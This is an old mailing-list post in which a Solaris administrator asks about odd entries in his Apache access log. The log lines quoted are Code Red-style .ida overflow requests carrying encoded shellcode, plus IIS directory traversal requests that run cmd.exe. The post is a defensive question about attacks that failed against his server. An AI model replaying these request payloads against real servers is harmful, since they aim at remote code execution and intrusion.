From: Mike's List (mikelist@sky.net)
Date: Wed Apr 16 2003 - 11:33:36 EDT
My access log for apache is full of the three lines below, is someone
attempting to hack my web server thinking it's a Windows machine???
Solaris running Apache...
x.x.x.x - - [13/Apr/2003:21:14:23 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 164
x.x.x.x - - [13/Apr/2003:22:38:34 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
x.x.x.x - - [13/Apr/2003:22:39:24 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
Thanks.
- Mike
[ In addition to www.sunfreeware.com more packages at ftp.patriots.net ]
-----
"They that can give up essential liberty to obtain a little
temporary safety deserve neither liberty nor safety."
-- Benjamin Franklin,
Historical Review of Pennsylvania.
_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers
This archive was generated by hypermail 2.1.7 : Wed Apr 09 2008 - 23:26:12 EDT